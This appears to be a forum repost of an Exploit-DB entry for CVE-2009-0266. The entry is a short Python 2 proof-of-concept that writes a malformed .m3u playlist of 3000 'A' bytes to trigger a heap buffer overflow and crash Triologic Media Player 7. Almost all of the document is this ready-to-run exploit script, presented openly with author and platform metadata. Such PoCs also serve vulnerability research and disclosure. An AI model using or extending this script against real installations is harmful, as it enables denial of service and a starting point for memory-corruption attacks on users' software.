Exploit Triologic Media Player 7 - '.m3u' Local Heap Buffer Overflow (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7737
Проверка EDB
  1. Пройдено
Автор
ZAX
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2009-0266 cve-2009-0262
Дата публикации
2009-01-12
Код:
# IN THE NAME OF ALLAH :)
#!/usr/bin/python
# Discovered By : zAx
# Download Application : http://www.download.com/Triologic-Media-Player/3000-2139_4-10601848.html?tag=mncol

print "**************************************************************************"
print " Triologic Media Player 7 (.m3u) Local Heap Buffer Overflow PoC\n"
print " Discovered By : zAx\n"
print " [email protected]\n"
print " In that PoC thanks for : Stack ;) My BrOthEr :)"
print "**************************************************************************"

overflow = "\x41" * 3000 # not right, just a PoC

try:
    out_file = open("zAx.m3u",'w')
    out_file.write(overflow)
    out_file.close()
    raw_input("\nPoC file created!, Now go to the program and click at Load Button\n")
except:
    print "Error"
# EoF

# milw0rm.com [2009-01-12]
 
Источник
www.exploit-db.com

Похожие темы